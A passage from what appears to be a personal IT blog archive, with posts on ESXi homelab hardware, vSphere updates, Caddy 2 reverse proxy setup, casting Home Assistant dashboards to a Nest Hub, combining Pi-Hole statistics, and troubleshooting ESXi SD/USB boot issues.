Driver for ESXi Fling in my ESXi image. Since I also have external USB based 2.5 GbE NICs, the USB Network Native Driver for ESXi Fling was also required. Each host also has en external USB enclosure with a 120 GB SSD drive in it, used as the boot medium. While USB boot of ESXi is being deprecated, this is at least a more durable option than booting from an SD-Card that is prone to dying. Dell OptiPlex 7090 UFF Host Details # Component Description Model OptiPlex 7090 UFF CPU 11th Gen Intel(R) Core(TM) i7-1185G7 @ 3.00GHz RAM 64 GB Storage 1 x 500 GB M.2 NVMe + 1 x 2 TB M.2 NVMe NIC 0 On-board Intel Corporation Ethernet Connection (13) I219-LM 1GbE NIC 1 External Startech USB 3.0 2.5GBase-T Boot device Kingston A400 SSD 120GB in an ICY BOX IB-235-U3 enclosure For now, the physical setup is a bit messy and leaves a lot to be desired in the cable management department, but at least they are operational. Note the ingenious use of velcro to attach the boot devices! Since each host has two M.2 NVMe devices, I can also use these for a vSAN setup as well, which I’ll cover in a later post. I am still waiting for the delivery of some additional Startech USB 3.0 2.5GBase-T NIC’s before I set that up, as I want to separate out the vSAN and vMotion traffic on the external USB NICs — And I promise to clean up the cables once everything is in place. Another limiting factor right now, is that the entire setup runs on a Cisco SG200-26 1 GbE switch, so I’m limited to 1 GbE for the time being. 1 GbE networks for vSAN is unsupported for all-flash setups, but as it’s an unsupported home lab environment it will have to do for now. At least until I get my hands on a 2.5 GbE switch that I can use for vMotion and vSAN traffic. Of course, 2.5 GbE is also unsupported (the only supported option for all-flash vSAN is 10 GbE or higher), but 2.5 GbE would be better than 1 GbE at least, but I’ll wait and see how the vSAN performs on this rig before I do anything. So there it is, my new 4 node ESXi cluster, based on the weird form factor Dell OptiPlex 7090 UFF’s! I’m also building a BOM with more details here.. --- # VMware vSphere 7 Update 3c Finally Released URL: https://vNinja.net/2022/01/29/vsphere-7-update-3c-finally-released/ Date: 2022-01-29 Author: christian Tags: vSphere, vSAN, VMware, ESXi Back in November 2021, VMware vSphere Update 3 was released and then ultimately retracted again due to critical issues with the code base and upgrade procedures — For details, see KB article 86398. As of January 27th, VMware vSphere 7 Update 3c is now available for download! vSphere ESXi 7 Update 3c Release Notes vCenter Server 7 Update 3c Release Notes vSphere 7 Update 3c – List of Known Issues and Workarounds As always, read through the Release Notes before upgrading your installs, in this release there are some quirks if you are affected by a dual driver conflict with the i40en and i40enu VIBs for the Intel network driver: When you start the update or upgrade of your vCenter Server system, an upgrade precheck runs a scan to detect if ESXi hosts of versions potentially affected by the issues around the Intel driver name change exist in your vCenter Server inventory. If the precheck identifies such ESXi hosts, a detailed scan runs to provide a list of all affected hosts, specifying file locations where you can find the list, and providing guidance how to proceed. IMPORTANT: You must first upgrade the list of affected hosts to ESXi 7.0 Update 3c before you continue to upgrade vCenter Server to 7.0 Update 3c. You can upgrade ESXi hosts that you manage with either baselines or a single image, by using the ESXi ISO image with an upgrade baseline or a base image of 7.0 Update 3c respectively. Do not use patch baselines based on the rollup bulletin. If the scan finds no affected hosts, you can continue with the upgrade of vCenter Server first. Normal procedure is to first upgrade vCenter, and then upgrade the ESXi hosts. In this case, that procedure is reversed if the current running version is affected by the dual driver issue. Also note that host upgrades should not be done with patch baselines if that is the case. --- # Caddy 2: A Couple of Simple Use Cases URL: https://vNinja.net/2022/01/28/caddy-a-couple-of-use-cases/ Date: 2022-01-28 Author: christian Tags: Caddy 2, Reverse Proxy Heard of Caddy? If not, here’s a quick intro on how I currently use it. Note that I am barely toucing the surface of what it can do, but after I have a couple of simple, yet very handy use cases for it. First off, what is Caddy 2? Caddy 2 is a powerful, enterprise-ready, open source web server with automatic HTTPS written in Go. Simply put, it’s a web server with, amongst other things, automatic TLS certificate support, and reverse proxy functionality. The official docs does a good job of explaining how to install it, on various operating systems, so head over there to get installation details. Use Case 1: Reverse Proxy with TLS support # My first use case, was to utilize Caddy 2 to provide reverse proxy functionality. I wanted to give plausible.io a go, and running it in a container seemed like a good route. I spun up an Ubuntu VM in my DMZ sone, whis is based on my existing Guide: Creating Isolated Networks with Ubiquiti UniFi configuration. Step 1: Install self-hosted plausible.io # I followed the plausible.io self-hosting installation guide , and the install was painless and worked right out of the box. By default, plausible.io is available on port 8000 after install. Step 2: Create public DNS records for plausible.io hostname # I host DNS for my domains on Cloudflare, so I created a new A record for a host in one of of my domains, pointing to the public IP of the Ubuntu VM in my DMZ. Step 3: Port Forward port 80/443 to the DMZ IP # Since my DMZ is running private IPs (and I do not have a block of public IPs) I configured my Unifi Firewall to port forward port 80 and 443 to the Ubuntu VM. Step 4: Configure Caddy 2 # Finally, we get to the Caddy 2 setup. I created a Caddyfile, with the following config: newhost_name { reverse_proxy 127.0.0.1:8000 } Obviously, replace new_host_name with your actual hostname from Step 2. All this config does, is to tell Caddy to redirect inbound connections on port 80/443 to port 8000 on your localhost, which in this case is the plausible.io container. Once the Caddyfile is in place, start Caddy 2 with caddy start. That’s where the magic happens, when Caddy detects a public DNS name in it’s config, it checks the hostname defined in your Caddyfile with the DNS records, and if it’s valid, it’ll automatically go out to Let’s Encrypt and request certificates for the domain (if it’s localhost or 127.0.0.1 it will create self-signed certificates). For details on the process, see Automatic HTTPS. This removes all the pain of automating this yourself, or fiddling around with certificates. All you need is a public hostname, and off you go, certificates and all! Once this was done, any requests to the hostname defined in the Caddyfile on either port 80 or 443, all get silently redirected to port 8000 which happens to be the plausible.io container. Obviosly, you can run several containers in the same VM (or other methods, I plan on moving all of this to VMware Tanzu at a later time). Adding access to a new container, via port 80/443, is as simple as copying the host declaration in the Caddyfile, and changing the hostname, and then restarting Caddy 2. Use Case 2: Simple HTTPS Static File Server # I suddenly also had the need to offer a set of files via a web server, also via HTTPS. For details on this, have a look at this Twitter thread, but the short of it was that newer VMware vCenter updates require HTTPS even if updating from a custom URL. Since I had recently played around with Caddy, I figured this should be something that it could also do. Turns out, it does. Step 1: Create new hostname in DNS # I added a new hostname to my DNS provider, like I did in Use Case 1 above. Step 2: Add new section to Caddyfile # Since I already had a Caddyfile defined, I added the following section to it: new_host_name { root * /static/ file_server browse } All this does, is to serve the files in /static/, with file listings. No other setup required in my case, as I just wanted the vCenter update bundle available via HTTPS. Since I already had the required port openings (port 80/443) from my first use case, I didn’t have to do anything else to my network or firewall setup. Serving the files # I extracted the .zip file I downloaded from VMware, and copied the files to /static/7u3c/. Once that was done, I restarted Caddy 2 with the caddy stop and caddy start commands and my static files were available, with a valid TLS certificate. Closing Comments # Obviously, you’ll want to run Caddy 2 as a service if using this in production, and the official documentation has you covered there as well. As mentioned, I am barely utlizing any of the features that Caddy has to offer, for instance you can also use it to redirect traffic to different hosts in your DMZ or network, but for now it has covered two specific use cases for me, in a very simple manner — and I really, really, really like the automatic certificate handling that it offers! --- # Casting Home Assistant Dashboards to Google Nest Hub 2nd Gen URL: https://vNinja.net/2022/01/05/homeassistant-google-nest-hub-2nd-gen/ Date: 2022-01-05 Author: christian Tags: Home Assistant, Home Automation, Node-RED I recently bought a Google Nest Hub 2nd gen and wanted to use it as a dashboard device for Home Assistant (HA). Now, the Google Nest Hub is not really meant used like this, as there is no real way of installing 3rd party apps on it, such as the Home Assistant app. Thankfully there are ways to get it to display Lovelace Dashboards from HA, one of them is by using the built in Home Assistant Cast capability, but that has some requirements that I didn’t like, namely that you need to either have your Home Assistant instance available from the internet, with proper certificates over HTTPS, or you need a Nabu Casa subscription (which in turn gives you the required encrypted access). I do not want my Home Assistant instance to be available at all from outside of my local network, if I need access to it when I’m not at home, I use other connection methods to get access to my local home network. The option I went for, was utilizing Cast All The Things (catt). Simply put, catt enables casting to compatible devices of both local and remote URLs, and it even works with http traffic locally. Installing Cast All The Things # I opted, after trying different things, to go for running catt in an Ubuntu instance I already had running in my Home Lab. Installing catt prerequisites (can be skipped if these are already in place) # sudo apt install python3-pip python3-setuptools Installing catt # pip3 install --user catt Once catt is installed, it enables a lot of options: Usage: catt [OPTIONS] COMMAND [ARGS]... Options: -d, --device NAME_OR_IP Select Chromecast device. --version Show the version and exit. -h, --help Show this message and exit. Commands: add Add a video to the queue (YouTube only). cast Send a video to a Chromecast for playing. cast_site Cast any website to a Chromecast. clear Clear the queue (YouTube only). del_alias Delete the alias name of the selected device. del_default Delete the default device. ffwd Fastforward a video by TIME duration. info Show complete information about the currently-playing video. pause Pause a video. play Resume a video after it has been paused. play_toggle Toggle between playing and paused state. remove Remove a video from the queue (YouTube only). restore Return Chromecast to saved state. rewind Rewind a video by TIME duration. save Save the current state of the Chromecast for later use. scan Scan the local network and show all Chromecasts and their IPs. seek Seek the video to TIME position. set_alias Set an alias name for the selected device (case-insensitive). set_default Set the selected device as default. skip Skip to end of content. status Show some information about the currently-playing video. stop Stop playing. volume Set the volume to LVL [0-100]. volumedown Turn down volume by a DELTA increment. volumeup Turn up volume by a DELTA increment. write_config DEPRECATED: Please use "set_default". Preparing Home Assistant # Creating a dedicated User # Next, I created a dedicated user for the Google Nest Hub in HA, without administrator access. Dedicated HA user for Nest Hub Allowing bypass login # Since there is no keyboard on the Nest Hub, typing in a password for an user account is problematic. In order to bypass that, some changes needs to be done to the Home Assistant configuration.yaml file: Under homeassistant: I added the following: auth_providers: - type: trusted_networks allow_bypass_login: True trusted_networks: - <Google Nest Hub IP Address> - type: homeassistant Basically this allows the Nest Hub to log into HA, without providing a password, given that it comes from the <Google Nest Hub IP Address>. When the Nest Hub opens HA for the first time, you select one of the available user accounts from a list, and select to remeber that user for subsequent logins. It then logs the device in, without asking for a password. I could also have used the trusted_users option, but I haven’t explored how that works yet. For details on how this works, check the Home Assistant Authentication Providers documentation. Creating Nest Hub specific Lovelace Dashboards # Next up, was creating some Nest Hub specific dashboards. I created new Lovelace Dashboards specifically for this, since my normal browser based ones are way to crowded to show on a small touch based device. In the end, I ended up with a new touch optimized dasboard, named Touch, with three views; Main, Lighting, Playing. Switching between them, is as easy as touching the icon for each of the views on the top row. In order to get a coherent and touch friendly dashboard, these rely heavily on nested Grid Cards. The yaml files for these are available here: main.yaml lighting.yaml playing.yaml Main View # Main View This view contains a top row that shows time and date, a second row that has some buttons; Night Mode, Away Mode, Party Mode, Alarm Status and AC Control. The mode buttons I use for other automations in Node-RED. When Night Mode is enabled a bunch of light are all turned off (while others stay on), Away Mode ensures that some things are not automatically happening when we are away, and Party Mode overrides automations that turns off other entities on predefined times and a few other things. Alarm Status basically justs shows if the alarm system is enabled or not (and lets us turn it on/off from the panel), and the AC Control button allows for setting the thermostat, heating/cooling mode, etc as well as show the current status. The second row is a bunch of gauges, that show indoor temperature, outdoor temperature, current power usage, indoor humidity and the current indoor CO2 measurements. Lighting View # Lighting View This View is pretty self explanatory, it controls lights. I’ve only included a subset of the lights here, as these are the ones on the floor where the Nest Hub is located. Playing View # Playing View This view just shows a standard Home Assistant Media Player connected to my Spotify account. This view is mainly used in the Node-RED Automations. catt scripts # As mentioned, I use catt to cast these Lovelace Dashboards to the Nest Hub, and doing so is pretty simple: catt -d <Google Nest Hub IP Address> cast_site http://<Internal HA IP/DNS Name>:8123/lovelace-touch/0 This casts my Main View to the Nest Hub, and after the initial login this works very nicely indeed. However, after 10 minutes, the Nest Hub goes into sleep mode, and stops the cast. It does not seem like the Nest Hub detects that the gauges change frequently, or that the clock updates. In order to bypass that, I decided to use Node-RED in HA to start casting every 9 minutes. Now, this is somewhat annoying as it forces a re-cast to the device, which redraws the display entirely, but I haven’t found a way to work around that in any other way. If someone knows how to disable sleep mode on a Nest Hub 2nd Gen, please let me know! At the time of writing, the Nest Gub 2nd Gen was running Firmware version 276689, Cast firmware version 1.56.27669, with catt v0.12.5. I have seen others that has had problems with the display timing out or sleeping after 30 seconds, but I have not seen that on my device. I have created two simple bash scripts on the VM that catt runs on: catt-dash0.sh #!/bin/bash # Grab existing volume value (This is hacky, since the output fom status only shows the value for volume if there is no video playing) nestvolume=$(/home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> status) nestvolume=${nestvolume:8} # Cast specific lovelace dashboard from HA /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> stop /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> volume 0 /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> cast_site http://<Internal HA IP/DNS Name>:8123/lovelace-touch/0 /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> volume $nestvolume catt-dash-spotify.sh #!/bin/bash # Grab existing volume value (This is hacky, since the output fom status only shows the value for volume if there is no video playing) nestvolume=$(/home/<username>/.local/bin/catt -d 192.168.5.132 status) nestvolume=${nestvolume:8} # Cast specific lovelace dashboard from HA /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> stop /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> volume 0 /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> cast_site http://<Internal HA IP/DNS Name>:8123/lovelace-touch/playing /home/<username>/.local/bin/catt -d <Google Nest Hub IP Address> volume $nestvolume Both scripts first stops any existing casts, and checks the existing volume setting from the Nest Hub, and stores that value in the nestvolume variable, and then sets the volume to 0, which is the same as mute. This is done because if the volume is on, the Nest Hub plays a sound when you start casting to it. Since I restart the casting every 9 minutes due to the sleep problem mentioned above, this gets annoying very quickly. They then proceed to start a new cast, of a specific dahboard/view, before setting the volume back to whatever value it was set to before the script ran. These two scripts are the basic ones I use for now, and I call these via Node-Red. Node-RED Automation # To overcome the problem with the Nest Hub sleeping, I have created a Node-RED flow that starts casting every 9 minutes. In addition I’m checking if something is playing on a Volumio with HiFiBerry instance I have running, if that’s the case, cast the Playing View, if not, show the default Main View. This is done with the node-red-contrib-bigssh node, that allows Node-RED to connect to a remote machine via SSH, and run commands: bigssh-node config Spotify The entire flow looks like this: Node-RED Flow The Spotify Cast node calls the catt-dash-spotify.sh script, and the Default Cast node calls catt-dash0.sh. The Timestamp node just repeats every 9 minutes, to ensure casting. All in all, it looks like this when all of it works together: And this, auto switching Lovelace Dasboards based on events in HA, via Node-RED. https://t.co/6jin0hsNnN pic.twitter.com/ygihyqxwyB — Christian Mohn™ (@h0bbel) January 3, 2022 Over time I’m sure I’ll work out other methods and use cases for this, but for now this works very well. It’s nice to have a small, stylish, fully touch enabled display where the most commonly used buttons are easily available. This is a bit of a hack, with quite a few moving parts, and in the long run I think most people will be happier with running this on a cheap-ish Android tablet, with the native Home Assistant App on it, instead of casting Lovelace Dashboards to a Google Nest Hub. --- # Combined Pi-Hole Statistics in Home Assistant URL: https://vNinja.net/2021/11/08/combined-pi-hole-stats-in-home-assistant/ Date: 2021-11-08 Author: christian Tags: Home Assistant, Home Automation, Pi-Hole I have been running Pi-Hole since 2018, and I’m still amazed as to how much ads it actually blocks. It’s simply incredible, and I often run my VPN client on my phone to connect to my home network, just to get DNS filtering no matter where I am. Due to some recent changes to my home environment, I have now moved to a dual Pi-Hole setup, utilizing Michael Stanclift’s excellent Gravity Sync to keep the Gravity blocklists syncronized between instances. I am also a heavy user of Home Assistant, so natually I have statistics from Pi-Hole visible in a Dashboard there as well, utilizing the Pi-Hole integration, which works very well. However, with two Pi-Hole instances, I would like to see some combined statistics, instead of them being seperated out by instance. Thankfully this a very easy to do in Home Assistant, by creating custom template sensors. In my setup, I have two Pi-Hole integrations enabled, one called pi_hole and one called pi_hole02. In order to combine some of the sensors, it’s a matter of creating a new combined sensor with the total values. Pi-Hole Combined Sensors example # Stick this in your Home Assistant configuration.yaml file, replace the sensor_pi_hole names with your own entity names, and you’ll be able to use two new sensors, namely total_ads_pihole, which is a combination of the ads blocked in the last 24 hours of both Pi-Hole instances, and total_pi_hole_dns_queries_cached which is the total number of cached queries. Add those to a Entities Card in Home Assistant, and you will have something that looks like this: --- # Hot Add NVMe Device Caused PSOD on ESXi URL: https://vNinja.net/2021/09/08/hot-add-nvme-device-caused-psod-on-esxi/ Date: 2021-09-08 Author: stine Tags: ESXi, VMware, vSphere, NVMe I recently had a case of “go with your gut” when we added some new NVMe disks to an existing VMware vSAN solution at a customer. Normally I’m very cautious and will put hosts into maintenance mode, no matter how small the hardware change I’m doing is, but against my better judgement this time I decided to hot add some disks (which of course is supported). However, I fumbled and managed to insert it and quickly remove it again before inserting it again, and ended up with a dreaded Purple Screen of Death (PSOD) on the host. Naturally this freaked me out and I was eager to figure out what the problem was. Searching through the KBs at VMware didn’t give me any clues, but a quick Google search took me to the ESXi 7.0u2c Release Notes: PR 2708326: If an NVMe device is hot added and hot removed in a short interval, the ESXi host might fail with a purple diagnostic screen. If an NVMe device is hot added and hot removed in a short interval, the NVMe driver might fail to initialize the NVMe controller due to a command timeout. As a result, the driver might access memory that is already freed in a cleanup process. In the backtrace, you see a message such as WARNING: NVMEDEV: NVMEInitializeController:4045: Failed to get controller identify data, status: Timeout. Eventually, the ESXi host might fail with a purple diagnostic screen with an error similar to #PF Exception … in world …:vmkdevmgr. This issue is resolved in this release.” Luckily, there were no more errors after hot adding the disks and rebooting the host, so the next step is of course some patching. I did not experience the same issue on any of the other hosts in that cluster, probably due to steadier hands or less caffeine in my bloodstream. --- # ESXi SD-Card/USB boot devices unsupported in 7.0u3 URL: https://vNinja.net/2021/09/02/esxi-sd-card-usb-boot-device-unsupported-in-7.0u3/ Date: 2021-09-02 Author: christian Tags: ESXi, VMware, vSphere In the ongoing saga of SD-Card/USB-boot device support in ESXi, VMware has just published a new KB article named “Persistent storage warnings when booting ESXi from SD-Card/USB devices. (85615)” outlining that from 7.0u3 (at the time of writing, not released yet) onward support for such boot devices is deprecated. As of 03. September 2021 the Persistent storage warnings when booting ESXi from SD-Card/USB devices. (85615) KB article has been removed from kb.vmware.com for unknown reasons. Hopefully it will be back soon. Update 16. September 2021: A new KB article has been published: Removal of SD card/USB as a standalone boot device option (85685). This article outlines that from the next major version, after 7.x, using standalone SD card/USB will be unsupported, with the following notice: “VMware strongly advises that you move away completely from using SD card/USB as a boot device option on any future server hardware.” ESXi requires local persistent storage for operating system use, to store system state, configuration, logs, and live data. A system with only a SD-Card/USB boot device is operating in an unsupported state with the potential for premature corruption. They also list the workarounds for this as either install to a non SD/USB device, or to add a persistent storage device. Additional information can also be found in Boot device guidance for low endurance media(vSphere and vSAN) (82515), which somewhat contradictory states that upgrades will still be supported in 7.x. For all upgrades ESXi 7.0 onwards, we continue to support existing boot devices. I have a suspicion that is 7.x specific, and that will change in a future version, and that ESXi might not even install on SD-Cards and USB thumb drives at some point. While I completely support and understand why VMware is doing this, and I would never recommend anyone running their production vSphere environments on hosts booting from SD-Card/USB boot devices, this might be an issue for homelab setups, especially those running vSAN. While small form factor nodes, like the Intel NUC, is inherently unsupported from VMware anyway, the new requirement of having a location to place the ESXi OS Data might be a problem. Many small form factor setups only allow two internal devices, typically one M.2 and one SATA3 device, and since vSAN requires a minimum of one cache drive and one capacity drive per disk group, this might be a problem for many small setups. One alternative is using booting the hosts from a resilient external USB drive (HDD/SSD/NVMe) in an enclosure, since using a USB device isn’t the real problem, but rather that the resiliency of the NAND chips on a SD-card or USB thumb drive isn’t suited for the storage scheme and layout introduced in ESXi 7.0. Another possibility is using USB storage for vSAN, or even using something like an rPI as an iSCSI target, either way you’ll need something outside of the vSAN cluster hosts themselves to ensure ESXi keeps running. Just like with everything else, plan accordingly. I do applaud VMware for being transparent about this. Publishing the new KB article before ESXi 7.0u3 is released is also good. Seems that part was premature, since the KB has since been pulled from the public. I think removing support for a boot option in a update release and not a major release is a bit strange. Anyone who is still running production vSphere hosts on SD-Card/USB thumb drives needs to take action as soon as possible to ensure support going forward. I am sure further guidance will also be given before the 7.0u3 update is released as well, especially now that the original KB has been pulled. --- # Upgrading to ESXi 7.0 build 18426014 U2c. ESXi stuck in Not responding from vCenter URL: https://vNinja.net/2021/08/24/upgrading-to-esxi-7.0-build-18426014-u2c-esxi-stuck-in-not-responding-from-vcenter/ Date: 2021-08-24 Author: Tags: ESXi, VMware, vSphere, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. Well, not directly related to the new ESXi 7 U2c build, BUT if you’re one of the lucky ones (like me), you’ve been experiencing big issues with SD/USB device since ESXi U1/U2, hence the vCenter <> ESXi (at least the configurations, tokens, etc.) has not been working for a while. I mean, last time vCenter talked successfully with my host was back in May 2021, when the USB dropped. That’s like four (4!) months ago. Today, VMware finally released the ESXi 7 U2c, which has included an updated module for the vmkusb. Hopefully this will fix the previous experienced SD/USB device issues, but before that - let’s talk patching! Patch plan - quick & dirty # As both LCM/VUM and/or esxcli is currently not able to patch ESXi since the current state of the USB is “broken” (due to the SD/USB issues), I planned to perform a quick reboot on the ESXi hosts, to first make the USB (boot device) accessible again, then proceed with patching, which should work (in theory), as it’s now able to update the images (VIBs) on the USB device. What happened # Verify USB/boot device not working, before proceeding with reboot [root@esx-13:~] df -h Error when running esxcli, return status was: 1 Errors: Cannot open volume: [root@esx-13:~] partedUtil getptbl /dev/disks/mpx.vmhba32\:C0\:T0\:L0 Unable to get device /dev/disks/mpx.vmhba32:C0:T0:L0 Comment: So yeah, this server needs reboot first, before able to talk to the boot device, which is USB (in my case listed as vmhba32). So I rebooted the host. Checking Intel AMT/KVM, the host booted up again, still on ESXi 7 U2a - build 17867351 (with the bug) I waited a little, but it never re-connected in VMware vCenter. VMware vCenter was still showing the host as “Not responding” - but the host is actually back up and running. So I quickly jumped into a SSH session on the host, and first verified that the bootbank & VMFS-L/OSDATA was available, and it was (hence, should be able to patch) [root@esx-13:~] df -h Filesystem Size Used Available Use% Mounted on VMFS-L 20.8G 1.6G 19.1G 8% /vmfs/volumes/LOCKER-6092997b-cd2ada42-23c0-000c292b45b0 vfat 4.0G 202.7M 3.8G 5% /vmfs/volumes/BOOTBANK1 vfat 4.0G 208.3M 3.8G 5% /vmfs/volumes/BOOTBANK2 vsan 5.5T 1.8T 3.6T 34% /vmfs/volumes/mgmt-01-vsan While manually reviewing vmkernel.log on the ESXi, I suddenly got this little alert - which originates from vRLI, sent to me via webhook, into my Slack-channel for monitoring. So I jumped into vRLI, to verify, and yeah, the hostd process on the newly rebooted ESXi host throws a “vRealize Log Insight Error” For a little more details, I manually checked the hostd.log under /var/log/hostd.log on the ESXi host, and I saw this 2021-08-24T15:11:00.907Z info hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Activation [N5Vmomi10ActivationE:0x00000010f9616270] : Invoke done [login] on [vim.SessionManager:ha-sessionmgr] 2021-08-24T15:11:00.907Z verbose hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Arg userName: --> "vpxuser" 2021-08-24T15:11:00.908Z verbose hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Arg password: --> (not shown) --> 2021-08-24T15:11:00.908Z verbose hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Arg locale: --> "" 2021-08-24T15:11:00.908Z info hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Throw vim.fault.InvalidLogin 2021-08-24T15:11:00.908Z info hostd[1052466] [Originator@6876 sub=Solo.Vmomi] Result: --> (vim.fault.InvalidLogin) { --> msg = "", --> } 2021-08-24T15:11:07.909Z error hostd[1052023] [Originator@6876 sub=Default opID=HostSync-host-4384-351d8304-de-1bb3] [module:pam_lsass]pam_do_authenticate: error [login:vpxuser][error code:2] 2021-08-24T15:11:07.909Z error hostd[1052023] [Originator@6876 sub=Default opID=HostSync-host-4384-351d8304-de-1bb3] [module:pam_lsass]pam_sm_authenticate: failed [error code:2] 2021-08-24T15:11:07.909Z warning hostd[1052023] [Originator@6876 sub=Default opID=HostSync-host-4384-351d8304-de-1bb3] Rejected password for user vpxuser from 127.0.0.1 2021-08-24T15:11:07.910Z info hostd[1052023] [Originator@6876 sub=Vimsvc.ha-eventmgr opID=HostSync-host-4384-351d8304-de-1bb3] Event 148 : Cannot login vpxuser@127.0.0.1 2021-08-24T15:11:07.911Z info hostd[1051983] [Originator@6876 sub=Vimsvc.TaskManager opID=7ccb1bb5 user=vpxuser] Task Created : haTask--vim.event.EventHistoryCollector.readNext-150 2021-08-24T15:11:07.911Z info hostd[1052127] [Originator@6876 sub=Vimsvc.TaskManager opID=7ccb1bb5 user=vpxuser] Task Completed : haTask--vim.event.EventHistoryCollector.readNext-150 Status success For fun, I re-tried restarting the services for hostd & vpxa, but I got the same issue. Basically the ESXi was not able to successfully re-connect in vCenter automatically (like it usually does). Quickfix # Well, it’s an easy one this time - just re-connect (duuh!). Doing a new “Connect” from vCenter, gives you an error on re-connecting, then a new login promt. Re-entering the credentials for the host, and boom - back online in vCenter. You may now patch your babies to the latest ESXi 7.0 build 18426014 U2c, hopefully fixing the SD/USB issues permanently. --- # On the Line with Cohesity Podcast Episode 42: Back to Travel and VMworld 2021 with Christian Mohn URL: https://vNinja.net/2021/08/04/on-the-line-cohesity-podcast/ Date: 2021-08-04 Author: christian Tags: Podcast, Cohesity As timings will have it, two podcasts I’ve been a guest on has been released this week. This time it is On The Line with Cohesity — Episode 42: Back to Travel and VMworld 2021 with Christian Mohn. Description # In this Episode of On The Line, Chris Colotti and Patrick Redknap discuss the upcoming VMworld 2021 virtual event with community member and vExpert Christian Mohn. The trio talks about their hopes for what changed from 2020, and some ideas on how to even get local groups of people together for viewing parties. Check it out in Apple Podcasts, Spotify or blubrry. --- # The On-Premise IT Roundtable Podcast: It’s Time to Embrace the Bottlenecks in Storage URL: https://vNinja.net/2021/08/03/the-on-premise-it-roundtable-podcast/ Date: 2021-08-03 Author: christian Tags: Podcast, YouTube, Storage I’ve recently had the opportunity to join the The On-Premise IT Roundtable Podcast for a discussion about storage and bottlenecks, titled “It’s Time to Embrace the Bottlenecks in Storage”. Have a listen, or watch, for a fun discussion about storage, bottlenecks, application proximity and aliens! # Podcast Description # Storage administration has always been about fighting bottlenecks, but today’s architecture means it’s time to embrace them instead. In this episode, our panel discusses the premise that it’s most important to match bottlenecks to the position in the infrastructure stack and application. One reason for this is the amazing bandwidth and low latency we have, thanks to Optane PMEM, NVMe, flash, and other technologies, but another is the emergence of new technologies that enable disaggregated architecture, moving storage closer to the application. Watch the recording on YouTube below, or visit the Gestalt IT Site for the audio only version. Panelists Christian Mohn Rob Koper David Klee Moderator Stephen Foskett --- # Storage Field Day #22 — Here We Go URL: https://vNinja.net/2021/07/30/sfd22-here-we-go/ Date: 2021-07-30 Author: christian Tags: Tech Field Day, Storage Field Day Next week is Storage Field Day 22, and for the first time since Tech Field Day 6 10 years ago, I am a delegate! I am really looking forward to hearing from the presenting sponsors, and being part of what looks like a really great group of delegates. Presenting Sponsors # infrascale FUJIFILM ctera Intel Komprise Pure Delegates (Twitter) # Brandon Graves Dan Frith David Klee Enrico Signoretti Erik Ableson Jason Benedicic Mikael Korsgaard Jensen Ray Lucchesi Rob Koper Wolfgang Stief Agenda # Handy ical link for all the Storage Field Day 22 presentations Day Time Sponsor Presenters Wednesday, Aug 4 8:00-9:30 Infrascale n/a Wednesday, Aug 4 11:00-13:30 Intel Allison Goodman, Elsa Asadian, Kelsey Prantis, Kristie Mann, Nash Kleppan, Sagi Grimberg Thursday, Aug 5 8:00-10:00 CTERA Aron Brand, Jim Crook, Liran Eshel Thursday, Aug 5 11:00-13:00 Komprise Krishna Subramanian, Mike Peercy, Mohit Dhawan Friday, Aug 6 8:00-9:00 Fujifilm n/a Friday, Aug 6 10:00-11:30 Pure Storage Ralph Ronzio, Stan Yanitskiy Note: All dates and times listed are local time in Virtual, US/Pacific. in Silicon Valley, US/Pacific. Join us live for what should be an awesome event! --- # vSoup Is Back! URL: https://vNinja.net/2021/06/30/vsoup-is-back/ Date: 2021-06-30 Author: christian Tags: Podcast, vSoup, YouTube After a rather prolonged hiatus, the vSoup Podcast is back! For the first time since March 2017, Ed, Chris and myself got together and recorded something. This time we even had our cameras on while recording, which we’ve never done before. Coincidentally 2021 is also the ten year anniversary for the first vSoup episode, which was released January 4th, 2011. In short, we just turned our cameras on and had a quick chat for about 20 minutes. So here it is, vSoup Reloaded — Episode 1: --- # ESXi 7.0 SD Card/USB Drive Issue Temporary Workaround URL: https://vNinja.net/2021/06/01/esxi-7.0-sd-card-issue-temporary-workaround/ Date: 2021-06-01 Author: Tags: ESXi, VMware, vSphere, esod Guest Post # This is a guest post by Espen Ødegaard, Senior Systems Consultant for Proact. # You can find him on Twitter and LinkedIn. Espen is usually found in vmkernel.log, esxtop, sexigraf or vSAN Observer. Or eating, he eats a lot. As VMware has not released a fix yet (regarding issues with SD card and USB drive), I’m still experiencing issues with ESXi 7.0 U2a Potentially Killing USB and SD drives, running from USB or SD card installs. As previous workaround (copying VMware Tools to RAMDISK with option ToolsRamdisk) only worked for 8 days (in my case), I needed something more “permanent”, to get the ESXi-hosts more “stable” (e.g. host being able to enter maintenance mode, move VMs around, snapshots/backup, doing CLI-stuff/commands, etc.). Stopping the “stale IOs” against vmhba32 makes ESXi happy again # As I previously just janked out my USB (which also works, by the way), I needed something more remote-friendly. Mentioned other places, a combination of esxcfg-rescan -d vmhba32, and restarting services/processes currently using the device (vmhba32), frees up the “stale/stuck IOs”, and ESXi is “happy again” (most things seems to be working fine, as VMware ESXi runs fine in RAM). That said, any “permanent configuration changes” to ESXi, etc. will not work, as all IOs against the device (which stores the changes) are not working.. This includes trying to patch the host. The device is in other words marked as failed, with APD/PDL (which I’m guessing is why the host is somewhat working again; not trying any IOs against the vmhba32 device equals no timeouts. No timeouts equals working processes etc. (wild guess). A quick reboot seems to make the drive working again, luckily. But only until the issue resurfaces (hours or days, in my experience so far). Checking the possible options for esxcfg-rescan # [root@esx-14:~] esxcfg-rescan -h esxcfg-rescan <options> <adapter> -a|--add Scan for only newly added devices. -d|--delete Scan for only deleted devices. -A|--all Scan all adapters. -u|--update Scan existing paths only and update their state. -h|--help Display this message. Running esxcfg-rescan -d on the device that has issues # In my case, it’s vmhba32 [root@esx-14:~] 